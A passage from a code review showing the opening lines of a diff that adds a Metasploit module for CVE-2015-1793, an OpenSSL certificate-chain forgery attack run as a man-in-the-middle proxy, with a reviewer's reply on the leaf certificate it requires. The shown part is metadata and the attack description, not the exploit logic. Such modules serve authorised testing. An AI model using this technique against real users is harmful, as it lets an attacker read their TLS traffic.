modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb

```diff
@@ -0,0 +1,208 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'openssl'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'OpenSSL Alternative Chains Certificate Forgery MITM Proxy',
+      'Description'    => %q{
+        This module exploits a logic error in OpenSSL by impersonating the server
+        and sending a specially-crafted chain of certificates, resulting in
+        certain checks on untrusted certificates to be bypassed on the client,
+        allowing it to use a valid leaf certificate as a CA certificate to sign a
+        fake certificate. The SSL/TLS session is then proxied to the server
+        allowing the session to continue normally and application data transmitted
+        between the peers to be saved.
+
+        The valid leaf certificate must not contain the keyUsage extension or it
+        must have at least the keyCertSign bit set (see X509_check_issued function
+        in crypto/x509v3/v3_purp.c); otherwise; X509_verify_cert fails with
+        X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. This module requires an
+        active man-in-the-middle attack.
+      },
+      'Author'      =>
+        [
+          'Ramon de C Valle'
+        ],
+      'License' => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [ 'Service' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service',
+      'References' => [
+        ['CVE', '2015-1793'],
+        ['CWE', '754'],
+        ['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
+        ['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
+      ],
+      'DisclosureDate' => 'Jul 9 2015'
+    )
+
+    register_options(
+      [
+        OptString.new('CACERT', [ true, "The leaf certificate's CA certificate", nil]),
```

Comment:
I didn't understand your question. The module does create the certificate for the HOST (i.e., fake_cert). However, you need a valid leaf certificate, which you already have or will obtain from a real CA, to sign it. This valid leaf certificate that must not contain the keyUsage extension or must have at least the keyCertSign bit set (or be a proxy certificate and have the digitalSignature bit set). The script above creates the certificates to simulate it.